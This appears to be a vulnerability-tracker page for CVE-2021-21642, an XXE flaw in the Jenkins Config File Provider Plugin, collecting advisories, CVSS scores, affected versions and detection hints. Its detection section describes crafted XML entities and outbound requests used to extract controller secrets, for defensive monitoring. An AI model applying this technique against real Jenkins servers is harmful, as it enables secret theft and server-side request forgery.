CVE-2021-21642
published 2021-04-21CVE-2021-21642: Jenkins Config File Provider Plugin 3.7.0 and earlier does not configure its XML parser to prevent XML external entity (XXE) attacks.
PriorityP261high8.1CVSS 3.1
AVNACLPRLUINSUCHIHAN
EPSS
37.83%
98.4th percentile
Jenkins Config File Provider Plugin 3.7.0 and earlier does not configure its XML parser to prevent XML external entity (XXE) attacks.
Affected
7 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| jenkins | cloudbees_cd_plugin | — | — |
| jenkins | config_file_provider | <= 3.7.0 | — |
| jenkins | config_file_provider_plugin | — | — |
| jenkins | ids_in_config_file_provider_plugin | — | — |
| jenkins | script_security_plugin | — | — |
| jenkins | templating_engine_plugin | — | — |
| jenkins_project | jenkins_config_file_provider_plugin | unspecified – 3.7.0 | — |
Detection & IOCsextracted from sources · hover to see the quote
- →An attacker must have the ability to define Maven configuration files in Jenkins to exploit this XXE vulnerability; monitor for unexpected or newly created Maven config files in the Config File Provider Plugin. ↗
- →The attack vector is a crafted XML configuration file containing external entity declarations; inspect Maven configuration files managed by the plugin for XXE payloads (e.g., DOCTYPE declarations with SYSTEM or PUBLIC entity references). ↗
- →Outbound DNS or HTTP requests originating from the Jenkins controller process may indicate XXE-based SSRF or secret exfiltration exploitation of this vulnerability. ↗
- ·Affected versions are Config File Provider Plugin 3.7.0 and earlier; the XML parser is not configured to prevent XXE attacks in these versions. ↗
- ·No practical mitigation short of patching has been identified by Red Hat; upgrading the plugin is the only recommended remediation. ↗
CVSS provenance
nvdv3.18.1HIGHCVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:N
nvdv2.05.5MEDIUMAV:N/AC:L/Au:S/C:P/I:P/A:N
vendor_redhat8.1HIGH
Stop checking back — get the weekly exploitation signal.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
GHSA
XML External Entity Reference vulnerability in Jenkins Config File Provider Plugin
ghsa·2022-05-24
CVE-2021-21642 [HIGH] CWE-611 XML External Entity Reference vulnerability in Jenkins Config File Provider Plugin
XML External Entity Reference vulnerability in Jenkins Config File Provider Plugin
Jenkins Config File Provider Plugin 3.7.0 and earlier does not configure its XML parser to prevent XML external entity (XXE) attacks.
This allows attackers with the ability to define Maven configuration files to have Jenkins parse a crafted configuration file that uses external entities for extraction of secrets from the Jenkins controller or server-side request forgery.
Jenkins Config File Provider Plugin 3.7.1 disables external entity resolution for its XML parser.
OSV
XML External Entity Reference vulnerability in Jenkins Config File Provider Plugin
osv·2022-05-24
CVE-2021-21642 [HIGH] XML External Entity Reference vulnerability in Jenkins Config File Provider Plugin
XML External Entity Reference vulnerability in Jenkins Config File Provider Plugin
Jenkins Config File Provider Plugin 3.7.0 and earlier does not configure its XML parser to prevent XML external entity (XXE) attacks.
This allows attackers with the ability to define Maven configuration files to have Jenkins parse a crafted configuration file that uses external entities for extraction of secrets from the Jenkins controller or server-side request forgery.
Jenkins Config File Provider Plugin 3.7.1 disables external entity resolution for its XML parser.
Jenkins
Jenkins Security Advisory 2021-04-21
vendor_jenkins·2021-04-21·CVSS 8.1
CVE-2021-21642 [HIGH] Jenkins Security Advisory 2021-04-21
Title: Jenkins Security Advisory 2021-04-21
Jenkins Security Advisory 2021-04-21
Jenkins Security Home
For Administrators
Overview
Terminology
Vulnerabilities and Scoring
Security Advisories
Security Issues
Advisory Schedule
Vulnerabilities in Plugins
How We Fix Security Issues
For Reporters
Reporting Vulnerabilities
Jenkins CNA
For Maintainers
Overview
Vulnerabilities in Plugins
Jenkins Security Team
About
Contributions
This advisory announces vulnerabilities in the following Jenkins deliverables:
CloudBees CD
Plugin
Config File Provider
Plugin
Templating Engine
Plugin
Descriptions
XXE vulnerability in Config File Provider Plugin
SECURITY-2204
/
CVE-2021-21642
Severity
Red Hat
jenkins-2-plugins/config-file-provider: Does not configure its XML parser to prevent XML external entity (XXE) attacks.
vendor_redhat·2021-04-21·CVSS 8.1
CVE-2021-21642 [HIGH] CWE-611 jenkins-2-plugins/config-file-provider: Does not configure its XML parser to prevent XML external entity (XXE) attacks.
jenkins-2-plugins/config-file-provider: Does not configure its XML parser to prevent XML external entity (XXE) attacks.
Jenkins Config File Provider Plugin 3.7.0 and earlier does not configure its XML parser to prevent XML external entity (XXE) attacks.
A flaw was found in the config-file-provider Jenkins plugin. The plugin XML parser wasn't configure to prevent XML external entity (XXE) attacks. An attacker with the ability to define Maven configuration files can use this vulnerability to prepare a crafted configuration file that uses external entities for extraction of secrets from the Jenkins controller or server-side request forgery.
Mitigation: Red Hat has investigated whether a possible mitigation exists for this issue, and has not been able to identify a practical example. Please
No detection rules found.
No public exploits indexed.
No writeups or analysis indexed.
2021-04-21
Published